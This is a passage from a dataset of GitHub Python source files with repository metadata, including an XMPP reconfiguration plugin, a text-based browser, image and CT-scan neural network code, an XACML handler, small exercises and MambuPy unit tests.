msg['from']))\n logger.debug(\"=====================================================\")\n\n compteurcallplugin = getattr(objectxmpp, \"num_call%s\"%action)\n\n if compteurcallplugin == 0:\n read_conf_loadreconf(objectxmpp)\n logger.debug(\"Configuration remote update\")\n objectxmpp.concurentdata = {}\n objectxmpp.loadreconf = types.MethodType(loadreconf,\n objectxmpp)\n objectxmpp.listconcurentreconf = []\n objectxmpp.schedule('loadreconf',\n objectxmpp.generate_reconf_interval,\n objectxmpp.loadreconf,\n args=(objectxmpp,),\n repeat=True)\n\n\ndef loadreconf(self, objectxmpp):\n \"\"\"\n Runs the load fingerprint\n \"\"\"\n # calcul time entre 2 demandes de reconfiguration.\n t = time.time()\n end = t + objectxmpp.generate_reconf_interval\n\n datasend = {\"action\": \"force_setup_agent\",\n \"data\": \"\",\n 'ret': 0,\n 'sessionid': getRandomName(5, \"loadreconf_\")}\n result = []\n while(time.time() < end):\n listmachine_timeoutreconf = [x[0] for x in objectxmpp.listconcurentreconf if x[2] <= t]\n if len(listmachine_timeoutreconf) != 0:\n #acquite sur timeout\n logger.warning (\"The following machines are currently offline and their reconfiguration will be processed later: %s\"%listmachine_timeoutreconf)\n XmppMasterDatabase().call_set_list_machine(listmachine=listmachine_timeoutreconf)\n # on supprime les non acquites suivant timeout de plus de generate_reconf_interval seconde\n objectxmpp.listconcurentreconf = [x for x in objectxmpp.listconcurentreconf if x[2] > t]\n viability = time.time() + objectxmpp.timeout_reconf\n\n list_need_reconf = [ x[0] for x in objectxmpp.listconcurentreconf]\n # lists reconf terminate\n if len(list_need_reconf) > 0:\n resultacquite = XmppMasterDatabase().call_acknowledged_reconficuration(list_need_reconf)\n # liste des concurent\n if len(resultacquite) > 0:\n logger.debug (\"concurent acquite machines id %s\"%resultacquite)\n objectxmpp.listconcurentreconf = [ x for x in objectxmpp.listconcurentreconf \\\n if x[0] not in resultacquite]\n if len(result) == 0:\n result = XmppMasterDatabase().call_reconfiguration_machine(limit = objectxmpp.nbconcurrentreconf)\n if len(result) == 0:\n return\n list_updatenopresence = []\n while len(objectxmpp.listconcurentreconf) < objectxmpp.nbconcurrentreconf and \\\n len(result) > 0 and \\\n time.time() < end:\n eltmachine = result.pop(0)\n eltmachine.append(viability)\n objectxmpp.listconcurentreconf.append(eltmachine)\n self.send_message( mto = eltmachine[1],\n mbody=json.dumps(datasend),\n mtype='chat')\n logger.debug (\"SEND RECONFIGURATION %s (%s)\"%(eltmachine[1], eltmachine[0]))\n list_updatenopresence.append(eltmachine[0])\n if len(list_updatenopresence) != 0:\n #logger.debug (\"update off presence machine reconf%s\"%list_updatenopresence)\n XmppMasterDatabase().call_set_list_machine(listmachine=list_updatenopresence)\n time.sleep(.2)\n\ndef read_conf_loadreconf(objectxmpp):\n namefichierconf = plugin['NAME'] + \".ini\"\n pathfileconf = os.path.join( objectxmpp.config.pathdirconffile, namefichierconf )\n if not os.path.isfile(pathfileconf):\n logger.warning(\"plugin %s\\nConfiguration file :\" \\\n \"\\n\\t%s missing\" \\\n \"\\neg conf:\\n[parameters]\\n\" \\\n \"generate_reconf_interval = 60\\n\" \\\n \"concurrentreconf = 240\\n\" \\\n \"timeout_reconf = 500\"%( plugin['NAME'],\n pathfileconf))\n objectxmpp.generate_reconf_interval = 60\n objectxmpp.nbconcurrentreconf = 240\n objectxmpp.timeout_reconf = 500\n else:\n Config = ConfigParser.ConfigParser()\n Config.read(pathfileconf)\n logger.debug(\"read file %s\"%pathfileconf)\n if os.path.exists(pathfileconf + \".local\"):\n Config.read(pathfileconf + \".local\")\n logger.debug(\"read file %s.local\"%pathfileconf)\n if Config.has_option(\"parameters\",\n \"generate_reconf_interval\"):\n objectxmpp.generate_reconf_interval = Config.getint('parameters',\n 'generate_reconf_interval')\n else:\n objectxmpp.generate_reconf_interval = 60\n\n if Config.has_option(\"parameters\",\n \"concurrentreconf\"):\n objectxmpp.nbconcurrentreconf = Config.getint('parameters',\n 'concurrentreconf')\n else:\n objectxmpp.nbconcurrentreconf = 240\n\n\n if Config.has_option(\"parameters\",\n \"timeout_reconf\"):\n objectxmpp.timeout_reconf = Config.getint('parameters',\n 'timeout_reconf')\n else:\n objectxmpp.timeout_reconf = 500\n objectxmpp.plugin_loadreconf = types.MethodType(plugin_loadreconf, objectxmpp)\n\ndef plugin_loadreconf(self, msg, data):\n # Manage update remote agent\n pass\n","repo_name":"medulla-tech/medulla","sub_path":"services/mmc/plugins/xmppmaster/master/pluginsmaster/plugin_loadreconf.py","file_name":"plugin_loadreconf.py","file_ext":"py","file_size_in_byte":7003,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"18"} +{"seq_id":"40171392421","text":"# coding: utf-8\n\nfrom collections import Counter\n\nnumbers = []\n\nfor _ in range(10):\n number = int(input())\n numbers.append(number)\n c = Counter(numbers)\n \nprint(sum(numbers)//10)\nprint(c.most_common(1)[0][0])\n\n","repo_name":"lee-seul/baekjoon","sub_path":"2592.py","file_name":"2592.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"35461554809","text":"# Implement a function my_sqrt that receives a non-negative integer x,\n# and returns the square root of x rounded down to the nearest integer.\n#\n# The returned integer should be non-negative as well.\n# You must not use any built-in exponent function or operator like x ** 0.5 or math.sqrt() in python.\n\ndef my_sqrt(x: int):\n for i in range(1, x + 1):\n if x // i == i:\n return i\n elif x // i == i - 1:\n return i - 1\n\n\nif __name__ == \"__main__\":\n for i in range(1, 100 + 1):\n print(f\"sqrt of {i} is: {my_sqrt(i)}\")","repo_name":"druckhead/EduLabs-FullStack-Course","sub_path":"python/Lessons/Lesson_6/Exam_1/E3.py","file_name":"E3.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11658210272","text":"import os\nimport sys\nimport requests\nfrom bs4 import BeautifulSoup\nimport colorama\nfrom colorama import init, Fore\n\n\nnytimes_com = '''\nThis New Liquid Is Magnetic, and Mesmerizing\n\nScientists have created “soft” magnets that can flow\nand change shape, and that could be a boon to medicine\nand robotics. (Source: New York Times)\n\n\nMost Wikipedia Profiles Are of Men. This Scientist Is Changing That.\n\nJessica Wade has added nearly 700 Wikipedia biographies for\n important female and minority scientists in less than two\n years.\n\n'''\n\nbloomberg_com = '''\nThe Space Race: From Apollo 11 to Elon Musk\n\nIt's 50 years since the world was gripped by historic images\n of Apollo 11, and Neil Armstrong -- the first man to walk\n on the moon. It was the height of the Cold War, and the charts\n were filled with David Bowie's Space Oddity, and Creedence's\n Bad Moon Rising. The world is a very different place than\n it was 5 decades ago. But how has the space race changed since\n the summer of '69? (Source: Bloomberg)\n\n\nTwitter CEO Jack Dorsey Gives Talk at Apple Headquarters\n\nTwitter and Square Chief Executive Officer Jack Dorsey\n addressed Apple Inc. employees at the iPhone maker’s headquarters\n Tuesday, a signal of the strong ties between the Silicon Valley giants.\n'''\n\n\n# write your code here\ndef get_request(url: str):\n if not url.__contains__(\"https://\"):\n url = 'https://' + url\n return requests.get(url)\n\ndef readable_text(text):\n text_list = []\n tags = ['title', 'p', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'a', 'ul', 'ol', 'li']\n s = BeautifulSoup(text, 'html.parser')\n for tag in s.find_all(tags):\n text = tag.get_text()\n if tag.name == 'a':\n text = Fore.BLUE + text\n text_list.append(text)\n return '\\n'.join(text_list)\n\n\nif __name__ == '__main__':\n args = sys.argv\n directory = args[1]\n stack = []\n\n if not os.access(directory, os.F_OK):\n os.mkdir(directory)\n if os.access(directory, os.F_OK):\n while True:\n line = input().strip()\n colorama.init(autoreset=True)\n if line == 'exit':\n break\n elif line == 'back':\n if len(stack) != 0:\n file_name = stack.pop()\n file_name = stack.pop()\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'r') as f:\n print(f.read())\n continue\n if line.count('.') > 0:\n # key = line.replace('.', '_')\n try:\n req = get_request(line)\n except requests.exceptions.ConnectionError:\n print('Incorrect URL')\n else:\n x = readable_text(req.content)\n print(x)\n file_name = line\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'w') as f:\n f.write(x)\n\n\n # if key in ['nytimes_com', 'bloomberg_com']:\n # if key == 'nytimes_com':\n # print(nytimes_com)\n # values = nytimes_com\n # else:\n # print(bloomberg_com)\n # values = bloomberg_com\n # file_name = key.split('_')[0]\n # stack.append(file_name)\n # file_path = os.path.join(directory, file_name)\n # with open(file_path, 'w') as f:\n # f.write(values)\n # else:\n # print('Error: Incorrect URL')\n else:\n key = line.split()\n if len(key) == 1:\n if key[0] in os.listdir(directory):\n file_name = key[0]\n stack.append(file_name)\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'r') as f:\n print(f.read())\n else:\n print('Error: Incorrect URL')\n else:\n print('Error: Incorrect URL')\n else:\n print('Error: Incorrect URL')\n","repo_name":"kushagrapunia/Text_Based_Browser","sub_path":"Text_Based_Browser.py","file_name":"Text_Based_Browser.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6565983609","text":"import numpy as np\r\nimport cv2\r\n\r\ndef main(img, user_input):\r\n #shows original image\r\n cv2.imshow(\"original\", img)\r\n \r\n #shows information image\r\n info = cv2.imread(\"blur_info.png\")\r\n cv2.imshow(\"info\", info)\r\n \r\n #makes a copy of original image\r\n blur = img.copy()\r\n #splits the image into three 2D arrays--blue, green, red values\r\n channels = cv2.split(img)\r\n #stores the image height and width\r\n height, width = img.shape[0], img.shape[1]\r\n #sets the kernel size\r\n k = user_input*2 + 1\r\n\r\n #sets a limit so the kernel doesn't go beyond the pixels and cause an error\r\n limit = int((k-1)/2)\r\n \r\n #loops through each channel\r\n for k in range(3):\r\n channel = channels[k]\r\n #loops through each colour value for a pixel\r\n for i in range(limit, height-limit):\r\n for j in range(limit, width-limit):\r\n #creates a slice of the image to calculate the average\r\n sample = np.zeros((k,k))\r\n sample = channel[i-limit:i+limit+1,j-limit:j+limit+1] \r\n \r\n #calculates mean and sets new pixel value in the new image\r\n mean = np.mean(sample)\r\n blur[i][j][k] = mean\r\n \r\n \r\n #shows new image\r\n cv2.imshow(\"blur\", blur)\r\n #ensures all windows close when a key is pressed\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n \r\n","repo_name":"timetraveller458/EPQ","sub_path":"blur_function.py","file_name":"blur_function.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7137000840","text":"import matplotlib.pyplot as plt\n\nx = [1, 2, 3, 4, 5, 6, 7, 8]\ny = [5, 7, 4, 5, 8, 2, 1, 3]\nplt.scatter(x, y, label='scattery', color='red', marker='*', s=100) # s here is th marker size\nplt.xlabel('x')\nplt.ylabel('y')\n\nplt.title('interesting Graph')\nplt.legend()\nplt.show()\n\n","repo_name":"messi10hitu/MATPLOT","sub_path":"scatter_plots.py","file_name":"scatter_plots.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13767821080","text":"import time\nimport threading\nimport socket\nimport queue\nimport os\nimport uuid\nimport tkinter as tk\nfrom common.config import Config\nfrom configparser import ConfigParser\n\ndef get_current_ms():\n return round(time.time() * 1000)\n\ndef get_current_ip_address():\n s_ip = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # socket for finding local network IP\n s_ip.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # reuse address if already in use\n ip = ''\n try:\n s_ip.connect(('10.255.255.255', 1))\n ip = s_ip.getsockname()[0]\n except Exception as e:\n print('Exception caught while trying to determine server IP')\n print(e)\n finally:\n s_ip.close()\n return ip\n\n# Read the file containing user settings\n# Create with default values, if no file exists yet\ndef read_user_config():\n if not os.path.isfile(\"config.ini\"):\n with open(\"config.ini\", \"w\") as f:\n pass\n\n config = ConfigParser()\n config.read(\"config.ini\")\n if not config.has_section(\"main\"):\n config.add_section(\"main\")\n\n # ID\n if config.has_option(\"main\", \"uuid\"):\n _id = config.get(\"main\", \"uuid\")\n else:\n _id = str(uuid.uuid4())\n config.set(\"main\", \"uuid\", _id)\n Config.ID = _id\n \n # Unknown devices\n if config.has_option(\"main\", \"unknown_client_handling\"):\n Config.UNKNOWN_CLIENT_HANDLING = config.getint(\"main\", \"unknown_client_handling\")\n else:\n config.set(\"main\", \"unknown_client_handling\", \"0\")\n \n # Full screenshots\n if config.has_option(\"main\", \"FULL_SCREENSHOTS_ENABLED\"):\n Config.FULL_SCREENSHOTS_ENABLED = config.getboolean(\"main\", \"FULL_SCREENSHOTS_ENABLED\")\n else:\n config.set(\"main\", \"FULL_SCREENSHOTS_ENABLED\", \"0\")\n\n # Save\n with open(\"config.ini\", \"w\") as f:\n config.write(f)\n\ndef set_user_config_option(option, value):\n config = ConfigParser()\n config.read(\"config.ini\")\n config.set(\"main\", option, value)\n with open(\"config.ini\", \"w\") as f:\n config.write(f)\n\ndef update_user_config():\n config = ConfigParser()\n config.read(\"config.ini\")\n config.set(\"main\", \"unknown_client_handling\", str(Config.UNKNOWN_CLIENT_HANDLING))\n config.set(\"main\", \"FULL_SCREENSHOTS_ENABLED\", str(Config.FULL_SCREENSHOTS_ENABLED))\n with open(\"config.ini\", \"w\") as f:\n config.write(f)\n\n# https://stackoverflow.com/a/48741004\nclass RepeatTimer(threading.Timer):\n def run(self):\n while not self.finished.wait(self.interval):\n self.function(*self.args, **self.kwargs)\n","repo_name":"PDA-UR/Screenshotmatcher-2.0","sub_path":"python-server/src/common/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"29899342280","text":"import torch\nimport torch.nn as nn\nimport torch.autograd as autograd\nfrom torch.autograd import Variable\nimport numpy as np\nfrom scipy.ndimage import gaussian_filter\n\ndef init_weights(m):\n \"\"\"\n Glorot uniform initialization for network.\n \"\"\"\n if 'conv' in m.__class__.__name__.lower():\n torch.nn.init.xavier_uniform_(m.weight)\n if m.bias is not None:\n m.bias.data.fill_(0.01)\n\ndef compute_out_size(in_size, mod):\n \"\"\"\n Compute output size of Module `mod` given an input with size `in_size`.\n \"\"\"\n \n f = mod.forward(autograd.Variable(torch.Tensor(1, *in_size)))\n return f.size()[1:]\n\nclass ResnetBlock(nn.Module):\n def __init__(self, input_features, nb_features=64, filter_len=3, stride=1, padding=0):\n super(ResnetBlock, self).__init__()\n self.conv1 = nn.Conv3d(input_features, nb_features, \n kernel_size=filter_len, stride=stride, \n padding=padding)\n self.conv2 = nn.Conv3d(nb_features, nb_features, \n kernel_size=filter_len, stride=stride, \n padding=padding)\n self.leakyrelu = nn.LeakyReLU()\n\n def forward(self, x):\n residual = x \n out = self.leakyrelu(self.conv1(x))\n out = self.conv2(out)\n out += residual\n out = self.leakyrelu(out)\n return out\n\n\nclass Refiner(nn.Module):\n def __init__(self, num_blocks=4, in_features=1, nb_features=64, filter_len=3, \n init=True, edge_kernel=None, use_cuda=True):\n super(Refiner, self).__init__()\n \n self.edge_kernel = edge_kernel\n\n # Input conv layer\n self.conv_1 = nn.Sequential(\n nn.Conv3d(in_channels=in_features, out_channels=nb_features, \n kernel_size=filter_len, stride=1, padding=1),\n nn.LeakyReLU()\n )\n\n # ResNet blocks\n blocks = []\n for i in range(num_blocks):\n blocks.append(ResnetBlock(nb_features, nb_features, \n filter_len=filter_len, padding=1))\n self.resnet_blocks = nn.Sequential(*blocks)\n\n # Output conv layer\n self.conv_2 = nn.Sequential(\n nn.Conv3d(in_channels=nb_features, \n out_channels=in_features, \n kernel_size=1, stride=1, padding=0),\n nn.Tanh()\n )\n \n # Initialize weights and biases\n if init:\n self.conv_1.apply(init_weights)\n self.resnet_blocks.apply(init_weights)\n self.conv_2.apply(init_weights)\n\n # Switch to GPU\n if use_cuda:\n self.conv_1 = self.conv_1.cuda()\n self.resnet_blocks = self.resnet_blocks.cuda()\n self.conv_2 = self.conv_2.cuda()\n\n def train_mode(self, flag=True):\n for p in self.parameters():\n p.requires_grad = flag\n\n def forward(self, x):\n out = self.conv_1(x)\n out = self.resnet_blocks(out)\n out = self.conv_2(out)\n if self.edge_kernel is not None:\n out = self.edge_kernel.apply_mask(x, out)\n return out\n\nclass EdgeKernel(nn.Module):\n def __init__(self, shapes, fade_perc=0.2, use_cuda=True):\n super(EdgeKernel, self).__init__()\n\n self.shapes = torch.tensor(shapes).type(torch.IntTensor)\n if use_cuda:\n self.shapes = self.shapes.cuda()\n \n self.masks = []\n for cnn_input_size in shapes:\n\n z_size = int(np.rint(fade_perc*cnn_input_size[0]))\n y_size = int(np.rint(fade_perc*cnn_input_size[1]))\n x_size = int(np.rint(fade_perc*cnn_input_size[2]))\n\n # Create the fade along each axis\n fade_z = np.linspace(0, 1, z_size)[...,np.newaxis,np.newaxis]\n fade_y = np.linspace(0, 1, y_size)[np.newaxis,...,np.newaxis]\n fade_x = np.linspace(0, 1, x_size)[np.newaxis,np.newaxis,...]\n \n # Turn this into a mask that can be applied to the scan during pre-processing.\n mask = np.ones((1,*cnn_input_size))\n mask[0,:z_size] *= fade_z\n mask[0,-z_size:] *= np.flip(fade_z)\n mask[0,:,:y_size] *= fade_y\n mask[0,:,-y_size:] *= np.flip(fade_y)\n mask[0,:,:,:x_size] *= fade_x\n mask[0,:,:,-x_size:] *= np.flip(fade_x)\n \n # Convolve with Gaussian\n mask = gaussian_filter(mask, sigma=0.6)\n \n mask = torch.Tensor(mask)\n if use_cuda:\n mask = mask.cuda()\n self.masks.append(mask)\n \n def apply_mask(self, orig_sample, edit_sample):\n # Locate correct mask\n shape = orig_sample.shape[-3:]\n shape = torch.tensor(shape, dtype=torch.int).view(1,3)\n indx = torch.nonzero(torch.sum(self.shapes==shape, dim=1)==3)\n mask = self.masks[indx]\n # Apply mask\n comb_sample = mask*edit_sample + (1-mask)*orig_sample\n return comb_sample\n \nclass Discriminator(nn.Module):\n def __init__(self, in_features=1, nb_features=[96,64,32,32,2], stride_len=[2,2,1,1,1], \n filter_len=3, init=True, use_cuda=True):\n super(Discriminator, self).__init__()\n\n paddings = []\n filter_lens = []\n for stride in stride_len:\n if stride>1:\n filter_lens.append(filter_len)\n paddings.append(1)\n else:\n filter_lens.append(1)\n paddings.append(0)\n \n # Convolutional layers\n self.convs = nn.Sequential(\n nn.Conv3d(in_channels=in_features, out_channels=nb_features[0], \n kernel_size=filter_lens[0], stride=stride_len[0], padding=paddings[0]),\n nn.LeakyReLU(),\n\n nn.Conv3d(in_channels=nb_features[0], out_channels=nb_features[1], \n kernel_size=filter_lens[1], stride=stride_len[1], padding=paddings[1]),\n nn.LeakyReLU(),\n\n nn.MaxPool3d(filter_len, 1, 1),\n\n nn.Conv3d(in_channels=nb_features[1], out_channels=nb_features[2], \n kernel_size=filter_lens[2], stride=stride_len[2], padding=paddings[2]),\n nn.LeakyReLU(),\n\n nn.Conv3d(in_channels=nb_features[2], out_channels=nb_features[3], \n kernel_size=filter_lens[3], stride=stride_len[3], padding=paddings[3]),\n nn.LeakyReLU(),\n\n nn.Conv3d(in_channels=nb_features[3], out_channels=nb_features[4], \n kernel_size=filter_lens[4], stride=stride_len[4], padding=paddings[4]),\n \n )\n \n # Initialize weights and biases\n if init:\n self.convs.apply(init_weights)\n\n # Switch to GPU\n if use_cuda:\n self.convs = self.convs.cuda()\n\n def train_mode(self, flag=True):\n for p in self.parameters():\n p.requires_grad = flag\n\n def forward(self, x):\n out = self.convs(x)\n out = out.permute(0, 2, 3, 4, 1).contiguous().view(-1, 2)\n out = nn.Softmax(dim=1)(out)\n return out","repo_name":"teaghan/CT_Editor","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":7218,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"25237647689","text":"from django.http import JsonResponse\nfrom game.models.player.player import Player\ndef update_score(request):\n data = request.GET\n score = data.get('score')\n username = data.get('username')\n score = int(score)\n player = Player.objects.get(user__username=username)\n player.score +=score\n player.save()\n return JsonResponse({\n 'result': \"success\",\n })\n","repo_name":"Avengers-s/myapp","sub_path":"game/views/playground/update_score.py","file_name":"update_score.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"22216984821","text":"from zip_processor import ZipProcessor\nimport sys\nfrom PIL import Image\n\nclass ScaleZip(ZipProcessor):\n\n def process_files(self):\n '''Scale each image in the directory to 640x480'''\n for filename in self.temp_directory.iterdir():\n im = Image.open(str(filename))\n scaled = im.resize((640, 480))\n scaled.save(str(filename))\n\nif __name__ == \"__main__\":\n ScaleZip(*sys.argv[1:4]).process_zip()\n","repo_name":"PacktPublishing/Python_Master-the-Art-of-Design-Patterns","sub_path":"Module 1/Chapter5/5_20_scaleimage_inheritance.py","file_name":"5_20_scaleimage_inheritance.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"18"} +{"seq_id":"32043229328","text":"from urllib import request\nfrom project import Project\nimport toml\n\nclass ProjectReader:\n def __init__(self, url):\n self._url = url\n\n def get_project(self):\n # tiedoston merkkijonomuotoinen sisältö\n content = request.urlopen(self._url).read().decode(\"utf-8\")\n # print(content)\n parsed_content = toml.loads(content).get('tool').get('poetry')\n # print(parsed_content)\n \n project_name = parsed_content.get('name')\n project_description = parsed_content.get('description')\n project_license = parsed_content.get('license')\n\n project_dependencies = []\n for key in parsed_content.get('dependencies'):\n project_dependencies.append(key)\n \n project_dev_dependencies = []\n for key in parsed_content.get('group').get('dev').get('dependencies'):\n project_dev_dependencies.append(key)\n\n # deserialisoi TOML-formaatissa oleva merkkijono ja muodosta Project-olio sen tietojen perusteella\n return Project(project_name , project_description, project_license, project_dependencies, project_dev_dependencies)\n","repo_name":"Gwasagir/ohjelmistotuotanto","sub_path":"viikko2/project-reader/src/project_reader.py","file_name":"project_reader.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4429139069","text":"import pdb\n\n\ndef calculate():\n\n lines = []\n with open(\"data.txt\") as f:\n lines = f.readlines()\n\n mem: list = [0]*100000\n mask = \"\"\n for line in lines:\n if line.startswith(\"mask =\"):\n mask = line.split(\" \")[2].strip()\n continue\n splitted = line.split(\" \")\n index = int(splitted[0][4:][:-1])\n number = \"{0:b}\".format(int(splitted[2]))\n number = \"0\"*(36 - len(number)) + number\n tmp = []\n for num in number:\n tmp.append(num)\n\n for i, num in enumerate(number):\n zeroes = False\n if mask[i] == \"X\":\n if zeroes:\n tmp[i] = 0\n continue\n else:\n tmp[i] = mask[i]\n zeroes = True\n number = \"\".join(tmp)\n mem[index] = number\n\n sum = 0\n for im in mem:\n if im != 0:\n sum += int(im, 2)\n\n print(f\"The sum is {sum}\")\n\n\nif __name__ == \"__main__\":\n calculate()\n","repo_name":"AutomatedTester/adventOfCode","sub_path":"2020/14/puzzle1.py","file_name":"puzzle1.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71266928359","text":"\nimport string\nimport xml.sax\nfrom xml.sax.handler import *\n\nclass XacmlHandler(ContentHandler):\n \"\"\"Crude extractor for XACML document\"\"\"\n def __init__(self):\n self.isCallingNumber = 0\n self.isCalledNumber = 0\n self.isTransformedCgpn = 0\n self.isTransformedCdpn = 0\n self.CallingNumber = 0\n self.CalledNumber = 0\n self.TransformedCgpn = 0\n self.TransformedCdpn = 0\n \n def startDocument(self):\n print('--- Begin Document ---')\n \n def startElement(self, name, attrs):\n if name == 'Attribute':\n self.attrs = attrs.get('AttributeId')\n print('AttributeId', self.attrs)\n elif name == 'AttributeValue':\n if self.attrs == 'urn:Cisco:uc:1.0:callingnumber':\n self.isCallingNumber = 1\n elif self.attrs == 'urn:Cisco:uc:1.0:callednumber':\n self.isCalledNumber = 1\n elif self.attrs == 'urn:Cisco:uc:1.0:transformedcgpn':\n self.isTransformedCgpn = 1\n elif self.attrs == 'urn:Cisco:uc:1.0:transformedcdpn':\n self.isTransformedCdpn = 1\n \n def endElement(self, name):\n if name == 'Request':\n # format xacml response based on called/calling numbers\n print('endElement Request')\n \n def characters(self, ch):\n if self.isCallingNumber == 1:\n self.CallingNumber = ch\n print('CallingNumber ' + ch)\n self.isCallingNumber = 0\n if self.isCalledNumber == 1:\n self.CalledNumber = ch\n print('CalledNubmer ' + ch)\n self.isCalledNumber = 0\n if self.isTransformedCgpn == 1:\n self.TransformedCgpn = ch\n print('TransformedCgpn ' + ch)\n self.isTransformedCgpn = 0\n if self.isTransformedCdpn == 1:\n self.TransformedCdpn = ch\n print('TransformedCdpn ' + ch)\n self.isTransformedCdpn = 0\n\n def callingNumber(self): return self.CallingNumber\n\n def calledNumber(self): return self.CalledNumber\n\n def transformedCgpn(self): return self.TransformedCgpn\n\n def transformedCdpn(self): return self.TransformedCdpn\n\nif __name__ == '__main__':\n parser = xml.sax.make_parser()\n handler = XacmlHandler()\n parser.setContentHandler(handler)\n parser.parse(\"sampleXacmlReq.xml\")\n","repo_name":"gve-sw/Route-CUCM-calls-by-O365-calendar-with-CURRI","sub_path":"saxXacmlHandler.py","file_name":"saxXacmlHandler.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"72031158121","text":"from . import TransformException, BaseTransform\n\nimport numpy as np\nfrom sklearn.decomposition import PCA as sklearnPCA\n\nclass PCA(BaseTransform):\n \"\"\"\n Args:\n Raises:\n TransformException\n Returns:\n \"\"\"\n\n def __init__(\n self,\n num_components=75,\n source='raw',\n output='output',\n inplace=True):\n\n super().__init__(source, output, inplace)\n self.num_components = num_components\n\n def __call__(self, data):\n super().__call__(data)\n\n X, y = data[self.source]\n X = X.copy()\n y = y.copy()\n X = self._apply_pca(X)\n\n super().update(data, (X, y))\n\n\n def _apply_pca(self, X):\n \"\"\"\n Applies PCA to the input array X.\n :param X: A 3-dimensional numpy array of size (x, y, z) where x == y == z.\n :param numComponents: The number of components to keep.\n :return: A 3-dimensional numpy array of size (x, y, numComponents) and the PCA object itself.\n \"\"\"\n newX = np.reshape(X, (-1, X.shape[2]))\n pca = sklearnPCA(n_components=self.num_components, whiten=True)\n newX = pca.fit_transform(newX)\n newX = np.reshape(newX, (X.shape[0], X.shape[1], self.num_components))\n return newX","repo_name":"blainerothrock/hyperspectral-imaging-ml","sub_path":"hyperspec/transforms/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70815014119","text":"print(\"Exponential Calculator \\n\"\n)\n\nprint(\"Please enter the range of numbers you would like to raise to an exponential power: \\n\")\n\ntry:\n value_1 = int(input(\"Number(Required): \"))\n\n input_value = input(\"Number(Optional): \")\n if (input_value == \"\"):\n value_2 = value_1\n else:\n value_2 = int(input_value)\n\n if value_1 > value_2:\n value_2 = value_1\n value_1 = int(input_value)\n\n print(\"\\nThanks! What exponent would you like to raise these numbers to? \\n\")\n\n exponent = int(input(\"Exponent(Required): \"))\n\n for i in range (value_1, value_2 + 1):\n print(\"No. {0:2} when raised to the power of {1:3} is {2:3}\".format(i, exponent, i**exponent))\n\nexcept:\n print(\"\\nError. Make sure that all values entered as integers and that all required values are filled in!\")\n","repo_name":"shreejalearn/PythonLearning","sub_path":"ExponentialCalc.py","file_name":"ExponentialCalc.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"21461944763","text":"# coding: utf-8\n\nimport os\nimport sys\n\nsys.path.insert(0, os.path.abspath(\".\"))\n\ntry:\n import mock\nexcept ModuleNotFoundError:\n import unittest.mock as mock\n\nimport unittest\n\nfrom MambuPy import mambuconfig\n\nfor k, v in mambuconfig.default_configs.items():\n setattr(mambuconfig, k, v)\nfrom MambuPy.rest import mambuactivity\n\ntry:\n unittest.TestCase.assertRegexpMatches = unittest.TestCase.assertRegex # python3\nexcept Exception as e:\n pass # DeprecationWarning: Please use assertRegex instead\n\n\nclass MambuActivityTests(unittest.TestCase):\n def test_mod_urlfunc(self):\n from MambuPy.mambugeturl import getactivitiesurl\n\n self.assertEqual(mambuactivity.mod_urlfunc, getactivitiesurl)\n\n def test_class(self):\n a = mambuactivity.MambuActivity(urlfunc=None)\n self.assertTrue(mambuactivity.MambuStruct in a.__class__.__bases__)\n\n def test___init__(self):\n a = mambuactivity.MambuActivity(urlfunc=None, entid=\"anything\")\n self.assertEqual(a.entid, \"anything\")\n\n def test___repr__(self):\n from MambuPy.mambugeturl import getactivitiesurl\n\n def build_mock_act_1(self, *args, **kwargs):\n self.attrs = {\"activity\": args[1]}\n\n with mock.patch.object(mambuactivity.MambuStruct, \"__init__\", build_mock_act_1):\n a = mambuactivity.MambuActivity(\n urlfunc=getactivitiesurl, entid=\"mockactivity\"\n )\n self.assertRegexpMatches(\n repr(a), r\"^MambuActivity - activityid: mockactivity\"\n )\n\n\nclass MambuActivitiesTests(unittest.TestCase):\n def test_class(self):\n acs = mambuactivity.MambuActivities(urlfunc=None)\n self.assertTrue(mambuactivity.MambuStruct in acs.__class__.__bases__)\n\n def test_iterator(self):\n acs = 